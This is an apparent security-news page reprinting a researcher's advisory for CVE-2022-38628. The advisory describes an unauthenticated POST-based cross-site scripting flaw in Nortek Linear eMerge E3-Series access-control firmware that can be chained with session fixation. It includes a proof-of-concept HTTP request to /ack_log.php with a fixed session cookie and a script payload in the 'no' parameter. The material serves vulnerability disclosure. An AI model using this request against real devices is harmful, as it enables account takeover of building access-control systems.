Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-38628: Security-Research/CVE-2022-38628.txt at main · omarhashem123/Security-Research

Nortek Linear eMerge E3-Series 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e were discovered to contain a cross-site scripting (XSS) vulnerability which is chained with a local session fixation. This vulnerability allows attackers to escalate privileges via unspecified vectors.

CVE
Open in Source
#xss#vulnerability#php#auth

# Exploit Title: Linear eMerge E3-Series devices are vulnerable to Post-Based-XSS via the “no” parameter

# Exploit Author: Omar Hashim

# Version: 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e

# Vendor home page: https://na.niceforyou.com/brands/linear/

# Vendor home page: https://www.nortekcontrol.com/access-control/

# Vendor home page: https://linear-solutions.com/

# Authentication Required: No

# CVE : CVE-2022-38628

# Description

====================

Linear eMerge E3-Series were discovered to contain a Post-Based XSS vulnerability via the “no” parameter that can be chained with the local session fixation to takeover admin or less privileged users accounts.

#Proof Of Concept:

====================

POST /ack_log.php HTTP/1.1

Host: Vulnerable-HOST:PORT

Cookie: PHPSESSID=t5a935jh5s8dd205f5s6sgr9a73cbf98

Content-Type: application/x-www-form-urlencoded

Content-Length: 42

no=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE